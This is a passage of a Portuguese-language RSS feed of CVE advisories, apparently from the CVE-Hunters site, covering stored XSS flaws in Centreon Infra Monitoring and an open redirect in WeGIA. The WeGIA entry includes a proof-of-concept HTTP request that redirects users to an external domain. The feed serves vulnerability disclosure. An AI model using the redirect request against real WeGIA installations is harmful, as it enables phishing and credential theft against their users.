        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54892-centreon-web-all-versions-medium-severity-5121&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54892-centreon-web-all-versions-medium-severity-5121&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54893</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-54893/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-54893/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54893-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54893: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54893&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54893&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração de modelos de Hosts&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração dos Conectores de Comandos) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54893-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54893: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54893&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54893&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração de modelos de Hosts&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração dos Conectores de Comandos) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-62361</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-62361/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-62361/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-62361-vulnerabilidade-de-open-redirect-no-parâmetro-nextpage-do-endpoint-controlphp&amp;#34;&amp;gt;CVE-2025-62361: Vulnerabilidade de Open Redirect no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-62361&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-62361&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Open Redirect foi identificada no endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; do aplicativo WeGIA, especificamente no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; (metodo=listarTodos nomeClasse=AlmoxarifeControle).&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Essa vulnerabilidade permite que invasores redirecionem usuários para domínios externos arbitrários, possibilitando campanhas de phishing, distribuição de payload malicioso ou roubo de credenciais de usuários.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;amp;laquo;p style=&amp;amp;ldquo;text-align: justify;&amp;amp;quot;&amp;amp;gt;O aplicativo falha ao validar e sanitizar a entrada do usuário no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Como resultado, invasores podem criar URLs maliciosas que redirecionam os usuários para sites externos fora do domínio confiável, minando a confiança do usuário e possibilitando ataques de engenharia social.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-62361-vulnerabilidade-de-open-redirect-no-parâmetro-nextpage-do-endpoint-controlphp&amp;#34;&amp;gt;CVE-2025-62361: Vulnerabilidade de Open Redirect no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-62361&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-62361&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Open Redirect foi identificada no endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; do aplicativo WeGIA, especificamente no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; (metodo=listarTodos nomeClasse=AlmoxarifeControle).&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Essa vulnerabilidade permite que invasores redirecionem usuários para domínios externos arbitrários, possibilitando campanhas de phishing, distribuição de payload malicioso ou roubo de credenciais de usuários.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;amp;laquo;p style=&amp;amp;ldquo;text-align: justify;&amp;amp;quot;&amp;amp;gt;O aplicativo falha ao validar e sanitizar a entrada do usuário no parâmetro &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Como resultado, invasores podem criar URLs maliciosas que redirecionam os usuários para sites externos fora do domínio confiável, minando a confiança do usuário e possibilitando ataques de engenharia social.&amp;lt;/p&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;GET /WeGIA/controle/control.php?metodo=listarTodos&amp;amp;amp;nomeClasse=AlmoxarifeControle&amp;amp;amp;nextPage=&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;request&amp;#34;&amp;gt;Request:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /WeGIA/controle/control.php?metodo=listarTodos&amp;amp;amp;nomeClasse=AlmoxarifeControle&amp;amp;amp;nextPage=https%3A%2F%2Fgoogle.com HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/geral/editar_permissoes.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: {COOKIE}
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O servidor aceita a solicitação elaborada e redireciona com sucesso a vítima para &amp;lt;code&amp;gt;https://google.com&amp;lt;/code&amp;gt; em vez de restringir a navegação ao domínio do próprio aplicativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Phishing: Invasores podem induzir usuários a visitar sites maliciosos que imitam sites legítimos.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Roubo de credenciais: Páginas de login falsas podem capturar credenciais de usuários.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Distribuição de malware: As vítimas podem ser redirecionadas para sites que hospedam software malicioso.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Danos à reputação: Os usuários podem perder a confiança na plataforma Wegia se forem vítimas de abuso em campanhas de phishing.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m99c-77f2-gpjx&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m99c-77f2-gpjx&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8429</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8429/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8429/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8429-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8429: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8429&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8429&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração de acesso à Ação ACL&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração de acesso à Ação ACL) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8429-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8429: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8429&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8429&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração de acesso à Ação ACL&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
